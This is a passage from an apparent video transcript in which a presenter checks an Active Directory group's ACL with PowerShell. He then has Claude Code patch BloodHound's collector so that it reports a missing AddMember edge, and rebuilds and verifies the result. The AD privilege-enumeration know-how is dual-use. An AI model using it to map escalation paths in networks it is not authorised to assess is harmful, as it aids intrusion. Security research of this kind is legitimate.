GUID. Is the GUID? No, I wanted to get the full distinguished name. This is what I wanted. And then we can do a get ACL on the AD drive. If you don't run a AD command to automatically import the Active Directory module, this is going to fail because you don't have this AD path. But if you do run get ACL and do AD : it fails. Just try to do a get AD user or import the Active Directory module. We'll do this, specify the DN, and this should get the ACL. Yep. So let's go like this and then do .access. I really should probably just switch to devious WinRM or something. That really annoys me when it fails, but I can show if I just paste this, the command's going to fail because we don't have the drive with AD. Get AD user, let's just do administrator. Doesn't really matter who we do, but that imports the module, gives us the AD drive, and bada bing. So let's search for, what was it, helpdesk? There we go. We see write property, and we don't see add member, but we have this object type. And if we look at what this object type is, I'm just going to Google this, go here, search. We can see this GUID matches over to member, right? So that's how we have the write property over member, and that's why it's showing add member as the Bloodhound edge. So now I want to go over to Bloodhound again. In Bloodhound code, actually, it has all the GUIDs. I think if I just search this, Curse of the Demo Gods. I guess it's not called that. Is it probably what is it? Force. Oh, because I'm not logged in, and that's why I'm not seeing it. Let's just clone this. Get clone, paste, CD Bloodhound. That change to GitHub always throws me off. What is this? Did that go to my clipboard? It did. grep-r for this thing. And we can see in the constants that is write member, this thing. But this isn't where the magic happens. The magic is actually going to happen with Claude Code. So if I just type Claude here, I've already got Claude Code installed and I logged into my account. We just have this. I'm going to ask it a question. I'm just going to say, let's say, this is not grabbing the write property add member ACL on an Active Directory group. I'm going to hope it does it similar to how it did when I was just playing with this off recording. It's going to take a while to run. I think it took me 5 to 10 minutes, but it actually fixed the code and all I had to do was say yes. It's really magic. So I'm going to do some editing magic to speed things up so we're not waiting 5 minutes for it to just read all the code. It's still running, but I really like that you can see now on the screen that's even going through the git commit history, it looks like, to identify changes that's around. Maybe it's using that to start building context. I don't know exactly what's going on and how it works this magic, but I just find this to be pretty fascinating. It's much better than watching grass grow with all this type of information going to the screen, but I'm going to keep it thinking and speed things up again. And after some time, Claude has come back with a suggestion. If we scroll up in this, it tries to say it in a human readable thing. So it found the bug and the problem, the ACE type 0x05 allow object ACE properly checks for add member on groups. ace type, whatever this, does not check for add member groups. It only creates the generic right. So I think when it comes to groups, it's just not checking for the right property on add members is my guess here. So if we do this, it's going to add the add member access control enumeration for groups and the ace type 0x00. And then I think it's going to go back, look over the code and see if there's anything else. Nope, it just wants to build. So let's go ahead and tell it to build. And this will probably take another like 3 to 4 minutes of building. And then we'll go ahead and run Bloodhound and see if it has the new property in the group. So I'm going to pause the video again and we'll resume when it's done. Okay, it is saying it is complete. This is what it did. So I'm just going to exit my session and then it should have built it for me. So if I do target release, oh, it built it in debug mode. That's horrible. I'm going to do a cargo build -- release to switch over to release mode. The whole reason I don't like it in debug mode is you'd be surprised how slow some Rust apps go when they're compiled in debug, probably just because they have a lot of hooks to give extra information. It's like a 10 times performance increase just by switching to release mode. But it looks like it's compiling fast. Once it gets to like 261, it's going to start slowing down. So now I'm just going to pause the video and we'll resume probably in like 60 to 90 seconds. Okay, it is now compiled. So we can go to target, release, and then I'm just going to do /Bloodhound. And we're going to run this and hope it got the edge. I know when I wasn't recording the video, it worked. That's the danger of AI is I can't guarantee it's going to work on this run. So let's go ahead and look at the groups file. This is what we did before, JQ dot. We got to do a less protected objects. Let's hope we have a add member ace. And we do. There it is. So this is the CID, this is the help desk group and add member. So yeah, I hope you guys liked the demo of Claude Code. It can even make the whole like git commit back to the project for you, but I'm not going to show that just because like I'm partially scared of all like the AI junkware that can just commit back to a project. After it does it, you should review it yourself, try to understand exactly what the code is doing, make sure what you're contributing back isn't going to just hurt the project in the long run, right? I don't think Bloodhound itself has a lot of just internal checks because it's hard to do this like unit checking on getting Active Directory objects. So I don't know if like this change would break other edges. So just always be careful with how you use AI, but I find it pretty cool that you can just ask it a question on the code base and it goes and finds the bug for you. So that's going to be the video. Take care all, and I will see you all next time.